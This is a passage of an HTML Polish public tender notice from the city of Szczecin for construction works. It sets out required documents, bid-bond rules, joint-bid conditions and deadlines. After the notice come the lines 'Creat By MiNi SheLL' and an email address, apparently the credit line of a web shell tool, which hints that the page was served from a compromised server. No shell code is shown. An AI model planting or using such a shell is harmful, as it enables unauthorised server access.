r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2025 r. poz. 514), zgodnie z wzorem stanowiącym Załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Na podstawie art. 274 ust 1 ustawy Pzp, ZAMAWIAJĄCY WEZWIE WYKONAWCĘ, którego oferta została oceniona najwyżej, do złożenia w terminie nie krótszym niż 5 dni, następujących podmiotowych środków dowodowych:<br/>Na potwierdzenie spełnienia warunków udziału w Postępowaniu:<br/>a)	Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>	Uwaga: Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez Zamawiającego podmiotowych środków dowodowych, wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez Zamawiającego warunku udziału w Postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/>b)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat od dnia upływu terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wzór wykazu robót budowlanych stanowi Załącznik nr 10 do SWZ.<br/>c)	Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu osób stanowi Załącznik nr 11 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca DO OFERTY ZAŁĄCZA:<br/>1.	Aktualne na dzień składania ofert oświadczenie stanowiące wstępne potwierdzenie, że wykonawca:<br/>1)	nie podlega wykluczeniu;<br/>2)	spełnia warunki udziału w Postępowaniu,<br/>zgodnie ze wzorem stanowiącym Załącznik nr 3 do SWZ. Wykonawca dołącza do oferty ww. oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w Postępowaniu w zakresie wskazanym w Rozdziale XVIII i XIX SWZ. <br/>Sporządza się pod rygorem nieważności, w formie elektronicznej i podpisuje się kwalifikowalnym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>2.	Jeśli dotyczy: Dokument zawierający wyjaśnienie wraz z uzasadnieniem, dlaczego zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. <br/>3.	Jeśli dotyczy: Pełnomocnictwo dla wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4.	Jeśli dotyczy: Oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie ze wzorem stanowiącym Załącznik nr 4 do SWZ. <br/>5.	W przypadku wspólnego ubiegania się o udzielenie zamówienia oświadczenie, o którym mowa w pkt 1 powyżej składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia (każdy podmiot wypełnia i podpisuje odrębne oświadczenie). Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w Postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w Postępowaniu. <br/>6.	Jeśli dotyczy: Wypełnione i podpisane zobowiązania podmiotów udostępniających zasoby, jeśli wykonawca korzysta z zasobów tych podmiotów na podstawie art. 118 ustawy Pzp – na formularzu zgodnym z wzorem stanowiącym Załącznik nr 5 do SWZ <br/>7.	W przypadku korzystania z podmiotu udostępniającego zasoby w celu wykazania spełniania warunku udziału w Postępowaniu wykonawca składa wraz z ofertą oświadczenie podmiotu udostępniającego zasoby, o którym mowa w pkt 1 powyżej (potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w Postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby).<br/>8.	Dokument, z którego wynika zakres umocowania do działania w imieniu wykonawcy w Postępowaniu: <br/>a)	Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. <br/>b)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy, jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z innych dokumentów, o których mowa w ppkt 1) powyżej, zgodnie z wzorem stanowiącym Załącznik nr 6 do SWZ.<br/>Uwagi: <br/>1.	Wykonawca nie jest zobowiązany do złożenia dokumentu, o którym mowa w ppkt 1) powyżej, jeżeli dokument Zamawiający może uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>2.	W przypadku korzystania z podmiotu udostępniającego zasoby, w celu wykazania spełnienia warunku udziału w Postępowaniu zasady składania dokumentów potwierdzających umocowanie do reprezentowania, o których mowa w ppkt 1) i 2) oraz zasadę wyrażoną w uwadze wskazanej w lit. a) dotyczące podmiotu udostępniającego zasoby stosuje się odpowiednio.<br/>9.	Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądzu, z uwzględnieniem postanowień Rozdziału XV. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do Postępowania jest zobowiązany – przed upływem terminem składania ofert wnieść wadium w wysokości 150 000,00 PLN (sto pięćdziesiąt tysięcy złotych 00/100). <br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2) i 3) oraz ust. 2 ustawy Pzp. <br/>3.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach: <br/>1)	w pieniądzu - przelewem na rachunek: Bank Pekao S.A. nr rachunku 97 1240 3927 1111 0010 3806 8666 z dopiskiem „Wadium – „nazwa Wykonawcy – znak sprawy: WNIOŚ.251.2.2025.PA”;<br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2025 r. poz. 98). <br/>4.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia, o których mowa w pkt 3 ppkt 2) – 4), wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym). <br/>6.	W przypadku wnoszenia wadium w pieniądzu zaleca się, aby np. w tytule przelewu wyraźnie oznaczyć wykonawcę wnoszącego wadium, szczególnie w przypadku, gdy wadium jest wnoszone przez pełnomocnika/pośrednika. Wadium wnoszone w pieniądzu wpłaca się w całości na rachunek bankowy wskazany w pkt 3 ppkt 1) powyżej. <br/>7.	W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia: <br/>1)	dokument gwarancji/poręczenia sporządzony w języku obcym należy złożyć wraz z tłumaczeniem na język polski;<br/>2)	dokument gwarancji/poręczenia powinien wskazywać jako beneficjenta gwarancji/poręczenia Zamawiającego - Gminę Miasto Szczecin;<br/>3)	gwarancje/poręczenia podlegać muszą prawu polskiemu; wszystkie spory odnośnie gwarancji/poręczeń będą rozstrzygane zgodnie z prawem polskim i poddane jurysdykcji sądów polskich. <br/>8.	W przypadku, gdy Wykonawca wnosi wadium w formie gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia z treści tych gwarancji/poręczeń musi w szczególności jednoznacznie wynikać: <br/>1)	zobowiązanie gwaranta/poręczyciela (np. banku, zakładu ubezpieczeń) do zapłaty nieodwołalnie i bezwarunkowo całej kwoty wadium w wysokości wskazanej w pkt 1 powyżej, na pierwsze żądanie Zamawiającego (beneficjenta gwarancji/poręczenia – Gminy Miasto Szczecin) zawierające oświadczenie, że zaistniały okoliczności, o których mowa w art. 98 ust 6 ustawy Pzp, bez potwierdzania tych okoliczności; <br/>2)	termin obowiązywania gwarancji/poręczenia, który nie może być krótszy niż termin związania ofertą. <br/>9.	Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium, w przypadku, o którym mowa w art. 98 ust. 2 pkt 3) ustawy Pzp zostanie odrzucona zgodnie z art. 226 ust. 1 pkt 14 ustawy Pzp. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2)	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w Postępowaniu albo do reprezentowania w Postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone do oferty. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje również pełnomocnictwo do poświadczania za zgodność z oryginałem wszystkich elektronicznych kopii dokumentów.<br/>3)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>4)	W przypadku, o którym mowa w ppkt 3) powyżej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika które usługi wykonają poszczególni wykonawcy. <br/>5)	W przypadku wspólnego ubiegania się przez wykonawców o udzielenie zamówienia oświadczenie potwierdzające brak podstaw wykluczenia oraz spełnianie warunków udziału w Postępowaniu (o którym mowa w Rozdziale XX pkt 1 SWZ) składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenie, o którym mowa w zdaniu poprzedzającym ma potwierdzać brak podstaw wykluczenia z Postępowania oraz spełnianie warunków udziału w Postępowaniu w zakresie, w jakim każdy z tych wykonawców powyższe wykazuje. <br/>6)	W terminie określonym w Rozdziale XXI pkt 1 SWZ, przedkłada w odniesieniu do tych podmiotów oświadczenia i dokumenty wskazane w Rozdział XXI pkt 1 ppkt 1) lit. a)-c) SWZ.<br/>7)	Wykonawcy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia. <br/>8)	Oferta wspólna, składana przez wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być sporządzona zgodnie z SWZ.<br/>9)	Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana jako oferta najkorzystniejsza, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia przedstawienia umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Zamawiający przewiduje możliwość dokonania zamian w umowie, na zasadach określonych we Wzorze Umowy, stanowiącym Załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-03 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com